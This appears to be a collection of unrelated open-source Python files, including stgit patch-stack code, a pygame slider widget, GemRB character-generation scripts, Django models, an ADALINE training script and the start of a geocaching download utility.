git.switch(top)
append_strings(self.__applied_file, names[0:forwarded])
write_strings(self.__unapplied_file, unapplied)
return forwarded
def merged_patches(self, names):
"""Test which patches were merged upstream by reverse-applying
them in reverse order. The function returns the list of
patches detected to have been applied. The state of the tree
is restored to the original one
"""
patches = [self.get_patch(name) for name in names]
patches.reverse()
merged = []
for p in patches:
if git.apply_diff(p.get_top(), p.get_bottom()):
merged.append(p.get_name())
merged.reverse()
git.reset()
return merged
def push_empty_patch(self, name):
"""Pushes an empty patch on the stack
"""
unapplied = self.get_unapplied()
assert(name in unapplied)
# patch = self.get_patch(name)
head = git.get_head()
append_string(self.__applied_file, name)
unapplied.remove(name)
write_strings(self.__unapplied_file, unapplied)
self.refresh_patch(bottom = head, cache_update = False, log = 'push(m)')
def push_patch(self, name):
"""Pushes a patch on the stack
"""
unapplied = self.get_unapplied()
assert(name in unapplied)
patch = self.get_patch(name)
head = git.get_head()
bottom = patch.get_bottom()
top = patch.get_top()
# top != bottom always since we have a commit for each patch
if head == bottom:
# A fast-forward push. Just reset the backup
# information. No need for logging
patch.set_top(top, backup = True)
git.switch(top)
append_string(self.__applied_file, name)
unapplied.remove(name)
write_strings(self.__unapplied_file, unapplied)
return False
# Need to create a new commit an merge in the old patch
ex = None
modified = False
# Try the fast applying first. If this fails, fall back to the
# three-way merge
if not git.apply_diff(bottom, top):
# if git.apply_diff() fails, the patch requires a diff3
# merge and can be reported as modified
modified = True
# merge can fail but the patch needs to be pushed
try:
git.merge_recursive(bottom, head, top)
except git.GitException, ex:
out.error('The merge failed during "push".',
'Revert the operation with "stg undo".')
append_string(self.__applied_file, name)
unapplied.remove(name)
write_strings(self.__unapplied_file, unapplied)
if not ex:
# if the merge was OK and no conflicts, just refresh the patch
# The GIT cache was already updated by the merge operation
if modified:
log = 'push(m)'
else:
log = 'push'
self.refresh_patch(bottom = head, cache_update = False, log = log)
else:
# we make the patch empty, with the merged state in the
# working tree.
self.refresh_patch(bottom = head, cache_update = False,
empty = True, log = 'push(c)')
raise StackException, str(ex)
return modified
def pop_patch(self, name, keep = False):
"""Pops the top patch from the stack
"""
applied = self.get_applied()
applied.reverse()
assert(name in applied)
patch = self.get_patch(name)
if git.get_head_file() == self.get_name():
if keep and not git.apply_diff(git.get_head(), patch.get_bottom(),
check_index = False):
raise StackException(
'Failed to pop patches while preserving the local changes')
git.switch(patch.get_bottom(), keep)
else:
git.set_branch(self.get_name(), patch.get_bottom())
# save the new applied list
idx = applied.index(name) + 1
popped = applied[:idx]
popped.reverse()
unapplied = popped + self.get_unapplied()
write_strings(self.__unapplied_file, unapplied)
del applied[:idx]
applied.reverse()
write_strings(self.__applied_file, applied)
def empty_patch(self, name):
"""Returns True if the patch is empty
"""
self.__patch_name_valid(name)
patch = self.get_patch(name)
bottom = patch.get_bottom()
top = patch.get_top()
if bottom == top:
return True
elif git.get_commit(top).get_tree() \
== git.get_commit(bottom).get_tree():
return True
return False
def rename_patch(self, oldname, newname):
self.__patch_name_valid(newname)
applied = self.get_applied()
unapplied = self.get_unapplied()
if oldname == newname:
raise StackException, '"To" name and "from" name are the same'
if newname in applied or newname in unapplied:
raise StackException, 'Patch "%s" already exists' % newname
if oldname in unapplied:
self.get_patch(oldname).rename(newname)
unapplied[unapplied.index(oldname)] = newname
write_strings(self.__unapplied_file, unapplied)
elif oldname in applied:
self.get_patch(oldname).rename(newname)
applied[applied.index(oldname)] = newname
write_strings(self.__applied_file, applied)
else:
raise StackException, 'Unknown patch "%s"' % oldname
def log_patch(self, patch, message, notes = None):
"""Generate a log commit for a patch
"""
top = git.get_commit(patch.get_top())
old_log = patch.get_log()
if message is None:
# replace the current log entry
if not old_log:
raise StackException, \
'No log entry to annotate for patch "%s"' \
% patch.get_name()
replace = True
log_commit = git.get_commit(old_log)
msg = log_commit.get_log().split('\n')[0]
log_parent = log_commit.get_parent()
if log_parent:
parents = [log_parent]
else:
parents = []
else:
# generate a new log entry
replace = False
msg = '%s\t%s' % (message, top.get_id_hash())
if old_log:
parents = [old_log]
else:
parents = []
if notes:
msg += '\n\n' + notes
log = git.commit(message = msg, parents = parents,
cache_update = False, tree_id = top.get_tree(),
allowempty = True)
patch.set_log(log)
def hide_patch(self, name):
"""Add the patch to the hidden list.
"""
unapplied = self.get_unapplied()
if name not in unapplied:
# keep the checking order for backward compatibility with
# the old hidden patches functionality
if self.patch_applied(name):
raise StackException, 'Cannot hide applied patch "%s"' % name
elif self.patch_hidden(name):
raise StackException, 'Patch "%s" already hidden' % name
else:
raise StackException, 'Unknown patch "%s"' % name
if not self.patch_hidden(name):
# check needed for backward compatibility with the old
# hidden patches functionality
append_string(self.__hidden_file, name)
unapplied.remove(name)
write_strings(self.__unapplied_file, unapplied)
def unhide_patch(self, name):
"""Remove the patch from the hidden list.
"""
hidden = self.get_hidden()
if not name in hidden:
if self.patch_applied(name) or self.patch_unapplied(name):
raise StackException, 'Patch "%s" not hidden' % name
else:
raise StackException, 'Unknown patch "%s"' % name
hidden.remove(name)
write_strings(self.__hidden_file, hidden)
if not self.patch_applied(name) and not self.patch_unapplied(name):
# check needed for backward compatibility with the old
# hidden patches functionality
append_string(self.__unapplied_file, name)
|
miracle2k/stgit
|
stgit/stack.py
|
Python
|
gpl-2.0
| 40,808
|
# This file contains the slider widget
import pygame
from transcendence.graphics.widget import Box
from transcendence.graphics.button import Button
from transcendence.graphics.progressbar import ProgressBar
import transcendence.graphics as graphics
from transcendence import util
class Slider(Box):
"""A slider widget presents a stepped sliding scale, beginning at min_value and ending at max_value.
min_value can be the larger one to have an inverted scale. The slider can be horizontal or vertical."""
def __init__(self, size, report, **kwargs):
background = kwargs.pop("background", graphics.colors.background)
borders = kwargs.pop("borders", ())
self._min_value = kwargs.pop("min_value", 0)
self._max_value = kwargs.pop("max_value", 100)
self._current_value = kwargs.pop("current_value", 0)
self._slider_units = kwargs.pop("slider_units", 5)
self.orientation = kwargs.pop("orientation", graphics.HORIZONTAL)
self.slider_color = kwargs.pop("slider_color", graphics.colors.med_highlight)
self.slider_hover_color = kwargs.pop("slider_hover_color", graphics.colors.strong_highlight)
super().__init__(size, background=background, borders=borders, **kwargs)
self.report = report
self.recalculate_slider()
self.hover_over_slider = False
def add_own_handlers(self):
self.parent.add_mouse_handler(self, None, self.mouse_leave, self.mouse_move, self.mouse_button_press, None)
def remove_own_handlers(self):
self.parent.remove_mouse_handler(self)
def recalculate_slider(self):
self.slider_rect = pygame.Rect(0,0,0,0)
self.recalculate_slider_size()
self.recalculate_slider_pos()
def recalculate_slider_pos(self):
i = 0 if self.orientation == graphics.HORIZONTAL else 1
pos = [0,0]
if self.max_value != self.min_value:
frac = (self.current_value - self.min_value) / (self.max_value - self.min_value)
pos[i] = int(frac * (self.size[i] - self.slider_size[i]))
self.slider_pos = tuple(pos)
self.slider_rect.topleft = self.slider_pos
def recalculate_slider_size(self):
i = 0 if self.orientation == graphics.HORIZONTAL else 1
size = list(self.size)
rel = self.slider_units / (abs(self.max_value - self.min_value) + self.slider_units)
size[i] = int(rel * self.size[i])
self.slider_size = tuple(size)
self.slider_rect.size = self.slider_size
def current_value_changed(self):
self.recalculate_slider_pos()
self.report(self.current_value)
self.needs_redraw = True
def limits_changed(self):
top = max(self.min_value, self.max_value)
bottom = min(self.min_value, self.max_value)
self.current_value = max(bottom, min(top, self.current_value))
self.recalculate_slider_pos()
self.recalculate_slider_size()
self.needs_redraw = True
slider_units = util.call_on_change("_slider_units", recalculate_slider)
min_value = util.call_on_change("_min_value", limits_changed)
max_value = util.call_on_change("_max_value", limits_changed)
current_value = util.call_on_change("_current_value", current_value_changed)
def find_value(self, x):
"""Given an x (or y) coordinate in global coordinates, find the value this represents."""
if self.min_value == self.max_value:
return self.min_value
i = 0 if self.orientation == graphics.HORIZONTAL else 1
lx = x - self.slider_size[i] // 2
width = self.size[i] - self.slider_size[i]
lx = min(width, max(0, lx))
return int(lx / width * (self.max_value - self.min_value) + self.min_value)
def mouse_button_press(self, mx, my, button):
if button == 1:
self.current_value = self.find_value(mx if self.orientation == graphics.HORIZONTAL else my)
self.hover_over_slider = True
return True
elif button == 4: # Mouse wheel up
self.step(self.orientation != graphics.HORIZONTAL, 10)
return True
elif button == 5:
self.step(self.orientation == graphics.HORIZONTAL, 10)
return True
return False
def mouse_move(self, mx, my, dx, dy, lb):
if lb:
self.current_value = self.find_value(mx if self.orientation == graphics.HORIZONTAL else my)
if self.slider_rect.collidepoint(mx, my) != self.hover_over_slider:
self.hover_over_slider = not self.hover_over_slider
self.needs_redraw = True
def mouse_leave(self, mx, my):
if self.hover_over_slider:
self.hover_over_slider = False
self.needs_redraw = True
def step(self, left=True, dist = 1):
"""Increment or decrement the current value by 1"""
s = util.sign(self.max_value - self.min_value)
if not left:
s = -s
top = max(self.min_value, self.max_value)
bottom = min(self.min_value, self.max_value)
self.current_value = max(bottom, min(top, self.current_value - s * dist))
def redraw_self(self):
if self.background:
self.surface.fill(self.background)
col = self.slider_hover_color if self.hover_over_slider else self.slider_color
self.surface.fill(col, self.slider_pos + self.slider_size)
self.draw_borders()
class BarSlider(ProgressBar):
def __init__(self, size, report, **kwargs):
# maximum value that can be set by clicking, for research sliders
self.clamp_value = kwargs.get("clamp_value", None)
self.hover_background = kwargs.get("hover_background", graphics.colors.background)
self.hover_bar_color = kwargs.get("hover_bar_color", graphics.colors.strong_highlight)
self.hover_text_color = kwargs.get("hover_text_color", graphics.colors.white)
super().__init__(size, **kwargs)
self.regular_bar_color = self.bar_color
self.regular_background = self.background
self.regular_text_color = self.label.text_color if self.label else None
self.inside = False
self.report = report
def add_own_handlers(self):
self.parent.add_mouse_handler(self, self.mouse_enter, self.mouse_leave, self.mouse_move,
self.mouse_button_press, None)
def remove_own_handlers(self):
self.parent.remove_mouse_handler(self)
def current_value_changed(self):
self.recalculate_bar()
self.report(self.current_value)
current_value = util.call_on_change("_current_value", current_value_changed)
def set_colors(self):
if self.inside:
self.background = self.hover_background
self.bar_color = self.hover_bar_color
if self.label:
self.label.text_color = self.hover_text_color
else:
self.background = self.regular_background
self.bar_color = self.regular_bar_color
if self.label:
self.label.text_color = self.regular_text_color
def mouse_enter(self, mx, my, lb):
self.inside = True
self.set_colors()
def mouse_leave(self, mx, my):
self.inside = False
self.set_colors()
def find_value(self, x):
if self.min_value == self.max_value:
return self.min_value
i = 0 if self.orientation == graphics.HORIZONTAL else 1
lx = min(self.size[i], max(0, x))
val = int(lx / self.size[i] * (self.max_value - self.min_value) + self.min_value)
if self.clamp_value and abs(val - self.min_value) > abs(self.clamp_value - self.min_value):
return self.clamp_value
else:
return val
def mouse_move(self, mx, my, dx, dy, lb):
if not lb:
return
self.current_value = self.find_value(mx if self.orientation == graphics.HORIZONTAL else my)
def mouse_button_press(self, mx, my, button):
if button == 1:
self.current_value = self.find_value(mx if self.orientation == graphics.HORIZONTAL else my)
return True
return False
|
Scaatis/Endgame
|
transcendence/graphics/slider.py
|
Python
|
gpl-2.0
| 8,183
|
import GemRB
from GUIDefines import *
from ie_stats import *
import CharGenCommon
import GUICommon
import Spellbook
import CommonTables
import LUCommon
import LUProfsSelection
def Imprt():
GemRB.SetToken("NextScript","CharGen")
GemRB.SetNextScript("ImportFile") #import
return
def setPlayer():
MyChar = GemRB.GetVar ("Slot")
GemRB.CreatePlayer ("charbase", MyChar | 0x8000 )
return False
def unsetPlayer():
MyChar = GemRB.GetVar ("Slot")
GemRB.CreatePlayer ("", MyChar | 0x8000 )
return False
def unsetGender():
#print "unset Gender"
MyChar = GemRB.GetVar ("Slot")
GemRB.SetPlayerStat (MyChar, IE_SEX, 0)
def unsetPortrait():
#print "unset Portrait"
GemRB.SetToken("SmallPortrait","")
GemRB.SetToken("LargePortrait","")
def getGender(area):
MyChar = GemRB.GetVar ("Slot")
area.SetText(12135)
area.Append (": ")
if GemRB.GetPlayerStat(MyChar,IE_SEX) == 1:
return area.Append(1050)
else:
return area.Append(1051)
#race
def unsetRace():
MyChar = GemRB.GetVar ("Slot")
GemRB.SetPlayerStat (MyChar, IE_RACE, 0)
def getRace(area):
MyChar = GemRB.GetVar ("Slot")
RaceID = GemRB.GetPlayerStat (MyChar, IE_RACE)
RaceIndex = CommonTables.Races.FindValue(3,RaceID)
RaceCap = CommonTables.Races.GetValue(RaceIndex,2)
area.Append(1048,-1) # new line
area.Append(": ")
area.Append(RaceCap)
#class
def unsetClass():
MyChar = GemRB.GetVar ("Slot")
GemRB.SetPlayerStat (MyChar, IE_CLASS, 0)
GemRB.SetPlayerStat (MyChar, IE_KIT, 0)
GemRB.SetVar ("MAGESCHOOL", 0)
def getClass(area):
MyChar = GemRB.GetVar ("Slot")
ClassTitle = GUICommon.GetActorClassTitle(MyChar)
area.Append(12136, -1)
area.Append(": ")
area.Append(ClassTitle)
def guardSpecialist():
return GemRB.GetVar("Specialist") == 1
def guardMultiClass():
return GemRB.GetVar("Multi Class") == 1
#Alignment
def unsetAlignment():
MyChar = GemRB.GetVar ("Slot")
GemRB.SetPlayerStat (MyChar, IE_ALIGNMENT,0)
def getAlignment(area):
MyChar = GemRB.GetVar ("Slot")
AllignID = GemRB.GetPlayerStat (MyChar, IE_ALIGNMENT)
area.Append(1049, -1)
area.Append(": ")
AllignIndex = CommonTables.Aligns.FindValue (3, AllignID)
AllignCap = CommonTables.Aligns.GetValue (AllignIndex, 2)
area.Append(AllignCap)
area.Append("\n")
#Abilties
def unsetAbilities():
MyChar = GemRB.GetVar ("Slot")
AbilityTable = GemRB.LoadTable ("ability")
AbilityCount = AbilityTable.GetRowCount ()
# set all our abilites to zero
GemRB.SetPlayerStat (MyChar, IE_STREXTRA, 0)
for i in range(AbilityCount):
StatID = AbilityTable.GetValue (i, 3)
GemRB.SetPlayerStat (MyChar, StatID, 0)
def getAbilities(area):
MyChar = GemRB.GetVar ("Slot")
AbilityTable = GemRB.LoadTable ("ability")
AbilityCount = AbilityTable.GetRowCount ()
for i in range(AbilityCount):
v = AbilityTable.GetValue(i,2)
id = AbilityTable.GetValue(i,3)
area.Append(v, -1)
area.Append(": "+str(GemRB.GetPlayerStat(MyChar,id)))
area.Append("\n")
area.Append("\n")
#Skill
def unsetHateRace():
MyChar = GemRB.GetVar ("Slot")
GemRB.SetPlayerStat(MyChar, IE_HATEDRACE, 0 )
def guardHateRace():
MyChar = GemRB.GetVar ("Slot")
Class = GemRB.GetPlayerStat(MyChar,IE_CLASS)
ClassName = CommonTables.ClassSkills.GetRowName(Class)
TableName = CommonTables.ClassSkills.GetValue(ClassName, "HATERACE")
return TableName != "*"
def getHatedRace(TextAreaControl):
MyChar = GemRB.GetVar ("Slot")
Race = GemRB.GetPlayerStat(MyChar, IE_HATEDRACE)
if Race:
HateRaceTable = GemRB.LoadTable ("HATERACE")
Row = HateRaceTable.FindValue (1, Race)
info = GemRB.GetString (HateRaceTable.GetValue(Row, 0))
if info != "":
#TextAreaControl.Append("\n")
info = ": " + info + "\n"
TextAreaControl.Append(15982)
TextAreaControl.Append(info)
def unsetMageSpells():
print("unsetMageSpells")
MyChar = GemRB.GetVar ("Slot")
Spellbook.RemoveKnownSpells (MyChar, IE_SPELL_TYPE_WIZARD, 1, 5, 1)
def guardMageSpells():
MyChar = GemRB.GetVar ("Slot")
Class = GemRB.GetPlayerStat(MyChar,IE_CLASS)
TableName = CommonTables.ClassSkills.GetValue(Class, 2)
return TableName != "*"
def getMageSpells(TextAreaControl):
MyChar = GemRB.GetVar ("Slot")
# arcane spells
info = ""
for level in range(0, 9):
for j in range(0, GemRB.GetKnownSpellsCount (MyChar, IE_SPELL_TYPE_WIZARD, level) ):
Spell = GemRB.GetKnownSpell (MyChar, IE_SPELL_TYPE_WIZARD, level, j)
Spell = GemRB.GetSpell (Spell['SpellResRef'], 1)['SpellName']
info += GemRB.GetString (Spell) + "\n"
if info != "":
info = "\n" + info + "\n"
TextAreaControl.Append (11027)
TextAreaControl.Append (info)
def guardSkills():
SkillTable = GemRB.LoadTable("skills")
RowCount = SkillTable.GetRowCount()-2
MyChar = GemRB.GetVar ("Slot")
Kit = GUICommon.GetKitIndex(MyChar)
if Kit != 0: # luckily the first row is a dummy
KitName = CommonTables.KitList.GetValue(Kit, 0) #rowname is just a number
else:
ClassID = GemRB.GetPlayerStat (MyChar, IE_CLASS)
ClassIndex = CommonTables.Classes.FindValue(5,ClassID)
KitName = CommonTables.Classes.GetRowName(ClassIndex)
for i in range(RowCount):
SkillName = SkillTable.GetRowName(i+2)
if SkillTable.GetValue(SkillName, KitName)==1:
return True
return False
def unsetSkill():
import LUSkillsSelection
MyChar = GemRB.GetVar ("Slot")
LUSkillsSelection.SkillsNullify ()
LUSkillsSelection.SkillsSave (MyChar)
def getSkills(TextAreaControl):
MyChar = GemRB.GetVar ("Slot")
# thieving and other skills
info = ""
SkillTable = GemRB.LoadTable ("skills")
ClassID = GemRB.GetPlayerStat (MyChar, IE_CLASS)
Class = CommonTables.Classes.FindValue (5, ClassID)
ClassName = CommonTables.Classes.GetRowName(Class)
RangerSkills = CommonTables.ClassSkills.GetValue (ClassName, "RANGERSKILL")
BardSkills = CommonTables.ClassSkills.GetValue (ClassName, "BARDSKILL")
KitName = GUICommon.GetKitIndex (MyChar)
if KitName == 0:
KitName = ClassName
else:
KitName = CommonTables.KitList.GetValue (KitName, 0)
if SkillTable.GetValue ("RATE", KitName) != -1 or BardSkills != "*" or RangerSkills != "*":
for skill in range(SkillTable.GetRowCount () - 2):
name = GemRB.GetString (SkillTable.GetValue (skill+2, 1))
id = SkillTable.GetValue (skill+2, 2)
available = SkillTable.GetValue (SkillTable.GetRowName (skill+2), KitName)
value = GemRB.GetPlayerStat(MyChar,id)
if value >= 0 and available != -1:
info += name + ": " + str(value) + "\n"
if info != "":
info = "\n" + info + "\n"
TextAreaControl.Append("\n")
TextAreaControl.Append (8442)
TextAreaControl.Append (info)
def unsetProfi():
MyChar = GemRB.GetVar ("Slot")
LUProfsSelection.ProfsNullify ()
LUProfsSelection.ProfsSave(MyChar, LUProfsSelection.LUPROFS_TYPE_CHARGEN)
def getProfi(TextAreaControl):
MyChar = GemRB.GetVar ("Slot")
# weapon proficiencies
TextAreaControl.Append ("\n")
TextAreaControl.Append (9466)
TextAreaControl.Append ("\n")
TmpTable=GemRB.LoadTable ("weapprof")
ProfCount = TmpTable.GetRowCount ()
#bg2 weapprof.2da contains the bg1 proficiencies too, skipping those
for i in range(ProfCount):
# 4294967296 overflows to -1 on some arches, so we use a smaller invalid strref
id = TmpTable.GetValue (i, 0)+IE_PROFICIENCYBASTARDSWORD
Weapon = GemRB.GetString (TmpTable.GetValue (i, 1))
Value = GemRB.GetPlayerStat (MyChar,id)
if Value:
pluses = " "
for plus in range(0, Value):
pluses += "+"
TextAreaControl.Append (Weapon + pluses + "\n")
#Appearance
def unsetColors():
MyChar = GemRB.GetVar ("Slot")
GUICommon.SetColorStat (MyChar, IE_HAIR_COLOR, 0 )
GUICommon.SetColorStat (MyChar, IE_SKIN_COLOR, 0 )
GUICommon.SetColorStat (MyChar, IE_MAJOR_COLOR, 0 )
GUICommon.SetColorStat (MyChar, IE_MINOR_COLOR, 0 )
def unsetSounds():
MyChar = GemRB.GetVar ("Slot")
GemRB.SetPlayerSound(MyChar,"")
#name
def unsetName():
MyChar = GemRB.GetVar ("Slot")
GemRB.SetPlayerName (MyChar, "", 0)
def getName(TextAreaControl):
MyChar = GemRB.GetVar ("Slot")
name = GemRB.GetPlayerName(MyChar)
if(name != ""):
TextAreaControl.Append(name + "\n")
#divine spells
def setDivineSpells():
MyChar = GemRB.GetVar ("Slot")
ClassID = GemRB.GetPlayerStat (MyChar, IE_CLASS)
Class = CommonTables.Classes.FindValue (5, ClassID)
ClassName = CommonTables.Classes.GetRowName(Class)
DruidTable = CommonTables.ClassSkills.GetValue (ClassName, "DRUIDSPELL")
ClericTable = CommonTables.ClassSkills.GetValue (ClassName, "CLERICSPELL")
print("CGG setDivineSpells: CP1",ClassID,Class,ClassName,DruidTable,ClericTable)
AllignID = GemRB.GetPlayerStat (MyChar, IE_ALIGNMENT)
if ClericTable != "*":
learnDivine(MyChar,0x4000,ClericTable,AllignID)
if DruidTable != "*":
learnDivine(MyChar,0x8000,DruidTable,AllignID)
return False
def learnDivine(MyChar,ClassFlag,TableName,AllignID):
#print ("CGG setDivineSpells: CP2",MyChar,ClassFlag,TableName,AllignID )
Spellbook.SetupSpellLevels(MyChar, TableName, IE_SPELL_TYPE_PRIEST, 1)
Learnable = Spellbook.GetLearnablePriestSpells( ClassFlag, AllignID, 1)
for i in range(len(Learnable) ):
#print ("CGG setDivineSpells: CP3",Learnable[i])
if -1 == Spellbook.HasSpell(MyChar,IE_SPELL_TYPE_PRIEST,1,Learnable[i]):
#print ("CGG setDivineSpells: CP4",Learnable[i])
GemRB.LearnSpell (MyChar, Learnable[i], 0)
def unsetDivineSpells():
print("unsetDivineSpells")
MyChar = GemRB.GetVar ("Slot")
Spellbook.RemoveKnownSpells (MyChar, IE_SPELL_TYPE_PRIEST, 1, 1, 1)
def getDivineSpells(TextAreaControl):
MyChar = GemRB.GetVar ("Slot")
# divine spells
info = ""
for level in range(0, 7):
for j in range(0, GemRB.GetKnownSpellsCount (MyChar, IE_SPELL_TYPE_PRIEST, level) ):
Spell = GemRB.GetKnownSpell (MyChar, IE_SPELL_TYPE_PRIEST, level, j)
Spell = GemRB.GetSpell (Spell['SpellResRef'], 1)['SpellName']
info += GemRB.GetString (Spell) + "\n"
if info != "":
info = "\n" + info + "\n"
TextAreaControl.Append (11028)
TextAreaControl.Append (info)
#finish
def setAccept():
#set my character up
MyChar = GemRB.GetVar ("Slot")
ClassID = GemRB.GetPlayerStat (MyChar, IE_CLASS)
Class = CommonTables.Classes.FindValue (5, ClassID)
ClassName = CommonTables.Classes.GetRowName(Class)
#reputation
AllignID = GemRB.GetPlayerStat (MyChar, IE_ALIGNMENT)
TmpTable=GemRB.LoadTable ("repstart")
t = TmpTable.GetValue (AllignID,0) * 10
GemRB.SetPlayerStat (MyChar, IE_REPUTATION, t)
#lore, thac0, hp, and saves
GemRB.SetPlayerStat (MyChar, IE_MAXHITPOINTS, 0)
GemRB.SetPlayerStat (MyChar, IE_HITPOINTS, 0)
LUCommon.SetupSavingThrows (MyChar)
LUCommon.SetupThaco (MyChar)
LUCommon.SetupLore (MyChar)
LUCommon.SetupHP (MyChar)
#slot 1 is the protagonist
if MyChar == 1:
GemRB.GameSetReputation( t )
#gold
TmpTable=GemRB.LoadTable ("strtgold")
t = GemRB.Roll (TmpTable.GetValue (ClassName,"ROLLS"),TmpTable.GetValue(ClassName,"SIDES"), TmpTable.GetValue (ClassName,"MODIFIER") )
GemRB.SetPlayerStat (MyChar, IE_GOLD, t*TmpTable.GetValue (ClassName,"MULTIPLIER") )
#set the base number of attacks; effects will add the proficiency bonus
GemRB.SetPlayerStat (MyChar, IE_NUMBEROFATTACKS, 2)
#colors
GUICommon.SetColorStat (MyChar, IE_METAL_COLOR, 0x1B )
GUICommon.SetColorStat (MyChar, IE_LEATHER_COLOR, 0x16 )
GUICommon.SetColorStat (MyChar, IE_ARMOR_COLOR, 0x17 )
#does all the rest
LargePortrait = GemRB.GetToken ("LargePortrait")
SmallPortrait = GemRB.GetToken ("SmallPortrait")
GemRB.FillPlayerInfo (MyChar, LargePortrait, SmallPortrait)
#10 is a weapon slot (see slottype.2da row 10)
GemRB.CreateItem (MyChar, "staf01", 10, 1, 0, 0)
GemRB.SetEquippedQuickSlot (MyChar, 0)
#LETS PLAY!!
playmode = GemRB.GetVar ("PlayMode")
GUICommon.CloseOtherWindow(None)
if playmode >=0:
CharGenCommon.close()
if GemRB.GetVar("GUIEnhancements"):
GemRB.SaveCharacter ( GemRB.GetVar ("Slot"), "gembak" )
GemRB.EnterGame()
else:
#show the export window
GemRB.SetToken("NextScript","CharGen")
GemRB.SetNextScript ("ExportFile")
|
ObsidianBlk/GemRB--Unofficial-
|
gemrb/GUIScripts/bg1/CharGenGui.py
|
Python
|
gpl-2.0
| 11,889
|
from django.db import models
class Institution(models.Model):
name = models.CharField(max_length=50);
@property
def teams(self):
return Team.objects.filter(institution=self)
@property
def judges(self):
return Judge.objects.filter(institution=self)
def __str__(self):
return self.name
class Team(models.Model):
name = models.CharField(max_length=50)
institution = models.ForeignKey(Institution)
speaker1 = models.CharField(max_length=50)
speaker2 = models.CharField(max_length=50)
@property
def total_team_points(self):
from results.controllers.PointsController import PointsController
controller = PointsController()
from draw.models import Tournament
return controller.total_points_for_team(self, Tournament.instance().round_with_results)
@property
def total_speaker_sum(self):
from results.controllers.PointsController import PointsController
controller = PointsController()
from draw.models import Tournament
return sum(controller.speaker_points_for_team(self, Tournament.instance().round_with_results))
@property
def speakers(self):
return [self.speaker1, self.speaker2]
def __str__(self):
return self.institution.__str__() + ' ' + self.name
class Judge(models.Model):
name = models.CharField(max_length=80)
institution = models.ForeignKey(Institution)
def __str__(self):
return self.name + ' <' + self.institution.__str__() + '>'
class Venue(models.Model):
name=models.CharField(max_length=50)
def __str__(self):
return self.name
|
sarrionandia/taber
|
data/models.py
|
Python
|
gpl-2.0
| 1,662
|
#!/usr/bin/python2
import math, sys, time
def drange(start, stop, step): #Generator for step <1, from http://stackoverflow.com/questions/477486/python-decimal-range-step-value
r = start
while r < stop:
yield r
r += step
class adaline:
def __init__(self, w_vec):#, bias): #absorbed
self.w_vec = w_vec
#self.bias = bias #absorbed
def transfer(self, yin, isTraining = False):
if isTraining: #training, f(yin) = yin
return yin
else: #not training, f(yin) = bipolar Heaviside step function
if yin >= 0:
return 1
else:
return -1
def calc_yin(self, x_vec): #Calculates yin = x.w + b
if len(x_vec) != len(self.w_vec):
raise Exception('Supplied input length does not match weight length.')
yin = 0
#yin = self.bias #absorbed
for xx,ww in zip(x_vec, self.w_vec):
yin += xx*ww
return yin
def train(self, s_vec_list, t_vec, rate):
if rate <= 0:
raise Exception('Rate not positive: ' + str(rate))
if len(s_vec_list) != len(t_vec):
raise Exception('Training set problem: input count does not match result count.')
insigFlag = False
loopCount = 0
while insigFlag == False and loopCount < numEpochs: #Loop till changes in the weights and bias are insignificant.
for s_vec, tt in zip(s_vec_list, t_vec):
yin = self.calc_yin(s_vec)
yy = self.transfer(yin, isTraining = True) # yy = yin
w_change = list()
bias_change = -2*rate*(yin - tt)
for i in range(len(self.w_vec)):
w_change.append(bias_change*s_vec[i])
if verbose_flag:
print "yy: ", yy
#print "bias_change: ", bias_change #absorbed
print "w_change: ", w_change
#self.bias = self.bias + bias_change #absorbed
for ii,wc in enumerate(self.w_vec):
self.w_vec[ii] = wc + w_change[ii]
#if math.fabs(bias_change) < 0.1: #absorbed
insigFlag = True #time to check if we need to exit
for wc in w_change:
if math.fabs(wc) < 0.1:
insigFlag = True
else:
insigFlag = False
break
#time.sleep(1)
loopCount += 1
###
verbose_flag = False
if len(sys.argv) > 2:
raise Exception('Too many arguments. Usage: adaline.py [-v|--verbose]')
elif len(sys.argv) == 1:
pass
elif sys.argv[1] == '-v' or sys.argv[1] == '--verbose':
verbose_flag = True
else:
raise Exception('Bad argument. Usage: adaline.py [-v|--verbose]')
numEpochs = 100
#ACTUAL
test_s_vec_list = [[1, 1, 1, 1], [-1, 1, -1, -1], [1, 1, 1, -1], [1, -1, -1, 1]]
test_t_vec = [1, 1, -1, -1]
#AND for 2
#test_s_vec_list = [[1, 1], [1, -1], [-1, 1], [-1, -1]]
#test_t_vec = [1, -1, -1, -1]
#AND for 4
#test_s_vec_list = [[1, 1, 1, 1], [1, -1, 1, -1], [-1, 1, -1, 1], [-1, -1, -1, -1]]
#test_t_vec = [1, -1, -1, -1]
for test_s_vec in test_s_vec_list:
test_s_vec.insert(0,1) #absorbing the bias by placing an input shorted to 1 at the head of each training vector
for alpha in [0.1,0.5]:#drange(0.01,1,0.01):
p = adaline([0 for x in test_s_vec_list[0]])#, 0) #absorbed
#alpha = 0.1 #ACTUAL: 0.5
p.train(test_s_vec_list, test_t_vec, rate=alpha)
if verbose_flag:
print "bias+weights: ", p.w_vec
sol_vec = list()
for test_s_vec in test_s_vec_list:
sol_vec.append(p.transfer(p.calc_yin(test_s_vec), isTraining = False))
if verbose_flag:
print 'Solution: ', sol_vec, '\nExpected (t_vec): ', test_t_vec
match_flag = True
for i,j in zip(sol_vec, test_t_vec):
if i != j:
match_flag = False
break
if match_flag:
print 't_vec matched with rate', alpha
|
anirudhr/neural
|
adaline.py
|
Python
|
gpl-2.0
| 4,068
|
#!/usr/bin/env python
#------------------------------------------------------------------------------
# Copyright (C) 2013 Albert Simenon
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#------------------------------------------------------------------------------
""" Gecoaching.com python utility """
__filename__ = "gc_util.py"
__version__ = "0.0.3"
__author__ = "Albert Simenon"
__email__ = "albert@simenon.nl"
__purpose__ = "Utility to download pocket queries from www.geocaching.com"
__date__ = "20/12/2013"
import argparse
import os
import progressbar
import urllib2
from selenium import webdriver
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
CHROMEDRIVER = "driver/chromedriver"
MAX_CACHES_PER_POCKET_QUERY = 950
MAX_CACHES_LAST_POCKET_QUERY = 500
BROWSERS = ["phantomjs","chrome","firefox","iexplorer"]
class GCSite:
""" Geocaching.com web browser class """
BASE_URL = "http://www.geocaching.com"
